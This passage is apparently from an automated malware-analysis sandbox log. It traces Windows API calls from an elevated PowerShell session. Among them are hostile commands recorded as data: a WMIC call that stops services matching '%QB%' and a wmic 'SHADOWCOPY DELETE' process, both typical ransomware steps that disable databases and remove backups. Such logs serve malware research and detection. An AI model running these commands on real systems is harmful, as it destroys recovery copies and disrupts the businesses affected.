ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xca, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xca, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.900] SetEvent (hEvent=0xa94) returned 1 [0313.900] SetEvent (hEvent=0xa00) returned 1 [0313.900] SetEvent (hEvent=0xa04) returned 1 [0313.900] SetEvent (hEvent=0xa90) returned 1 [0313.901] SetEvent (hEvent=0xaa4) returned 1 [0313.901] SetEvent (hEvent=0xa98) returned 1 [0313.901] SetEvent (hEvent=0xa9c) returned 1 [0313.901] SetEvent (hEvent=0xaa0) returned 1 [0313.901] SetEvent (hEvent=0xaac) returned 1 [0313.901] SetEvent (hEvent=0xaa8) returned 1 [0313.902] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0313.907] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0313.909] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x7456d521, Data2=0xa790, Data3=0x40f2, Data4=([0]=0xaa, [1]=0xa0, [2]=0x7b, [3]=0x69, [4]=0x9c, [5]=0xff, [6]=0xf6, [7]=0xde))) returned 0x0 [0313.909] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=40894404357) returned 1 [0313.909] AmsiOpenSession () returned 0x0 [0313.909] AmsiScanString () returned 0x80070015 [0313.918] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=40895293004) returned 1 [0313.919] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="") returned 0x0 [0313.919] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.919] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xca, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.919] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.919] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.919] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.919] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.920] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0313.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0313.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0313.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0313.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0313.921] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0313.921] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0313.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0313.921] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0313.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0313.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0313.922] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0313.922] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0313.922] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0313.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0313.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0313.923] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0313.923] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0313.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0313.923] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0313.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0313.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0313.924] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0313.924] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0313.924] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0313.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0313.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0313.924] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0313.925] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0313.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0313.925] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0313.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0313.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0313.925] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0313.925] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0313.925] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0313.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0313.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0313.926] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0313.926] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0313.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0313.926] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0313.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0313.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0313.926] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0313.926] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0313.927] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c6e0 [0313.927] FindNextFileW (in: hFindFile=0x7e1c6e0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0313.927] FindClose (in: hFindFile=0x7e1c6e0 | out: hFindFile=0x7e1c6e0) returned 1 [0313.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0313.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0313.928] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0313.928] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.928] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.928] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xd3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0313.928] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0313.929] GetConsoleWindow () returned 0x302b8 [0313.933] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0313.934] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0313.934] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0313.934] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0313.935] CoTaskMemFree (pv=0x7e29450) [0313.936] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QB%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4cec274 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QB%%'\" call stopservice", lpProcessInformation=0x4cec274*(hProcess=0xaec, hThread=0xae8, dwProcessId=0x2c0, dwThreadId=0xe10)) returned 1 [0313.954] CloseHandle (hObject=0xae8) returned 1 [0313.954] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0313.955] GetCurrentProcess () returned 0xffffffff [0313.955] GetCurrentProcess () returned 0xffffffff [0313.955] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xaec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0xae8) returned 1 [0313.955] CoWaitForMultipleHandles (dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0xae8, lpdwindex=0x8b0e71c) Thread: id = 203 os_tid = 0xfa4 Thread: id = 223 os_tid = 0x348 Thread: id = 231 os_tid = 0xa38 Thread: id = 237 os_tid = 0x10f4 Thread: id = 244 os_tid = 0xf3c Thread: id = 250 os_tid = 0x520 Thread: id = 256 os_tid = 0x12b4 Thread: id = 262 os_tid = 0xd64 Thread: id = 268 os_tid = 0x1250 Thread: id = 274 os_tid = 0xca4 Thread: id = 280 os_tid = 0x51c Thread: id = 286 os_tid = 0x868 Thread: id = 295 os_tid = 0xd8c Thread: id = 302 os_tid = 0x1148 Thread: id = 308 os_tid = 0x168 Thread: id = 319 os_tid = 0xdc4 Thread: id = 325 os_tid = 0xd34 Thread: id = 331 os_tid = 0xe18 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xaa3b000" os_pid = "0x13cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 53 os_tid = 0x13b4 Thread: id = 54 os_tid = 0x13ac Thread: id = 55 os_tid = 0x138c Thread: id = 56 os_tid = 0x1394 Thread: id = 57 os_tid = 0x1398 Thread: id = 221 os_tid = 0xa50 Thread: id = 222 os_tid = 0x11fc Process: id = "7" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x21677000" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 77 os_tid = 0x1298 [0251.226] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0251.226] __set_app_type (_Type=0x1) [0251.226] __p__fmode () returned 0x776f3c14 [0251.226] __p__commode () returned 0x776f49ec [0251.226] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0251.227] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0251.227] ??0CHString@@QAE@XZ () returned 0xa685ec [0251.227] malloc (_Size=0x18) returned 0x2bb0e70 [0251.228] malloc (_Size=0x38) returned 0x2bb0e90 [0251.228] malloc (_Size=0x28) returned 0x2bb0ed0 [0251.228] malloc (_Size=0x18) returned 0x2bb0f00 [0251.228] malloc (_Size=0x24) returned 0x2bb0f20 [0251.228] malloc (_Size=0x18) returned 0x2bb0f50 [0251.228] malloc (_Size=0x18) returned 0x2bb0f70 [0251.228] ??0CHString@@QAE@XZ () returned 0xa688fc [0251.228] malloc (_Size=0x18) returned 0x2bb0f90 [0251.228] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0251.228] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0251.228] _onexit (_Func=0xa5f370) returned 0xa5f370 [0251.228] _onexit (_Func=0xa5f380) returned 0xa5f380 [0251.229] _onexit (_Func=0xa5f390) returned 0xa5f390 [0251.229] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0251.229] ResolveDelayLoadedAPI () returned 0x74a22590 [0251.229] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0251.235] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0251.251] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x2e84840) returned 0x0 [0251.337] GetCurrentProcess () returned 0xffffffff [0251.337] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x87f8e8 | out: TokenHandle=0x87f8e8*=0x194) returned 1 [0251.337] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x87f8e4 | out: TokenInformation=0x0, ReturnLength=0x87f8e4) returned 0 [0251.337] malloc (_Size=0x118) returned 0x2bb2668 [0251.337] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x2bb2668, TokenInformationLength=0x118, ReturnLength=0x87f8e4 | out: TokenInformation=0x2bb2668, ReturnLength=0x87f8e4) returned 1 [0251.337] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x2bb2668*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), 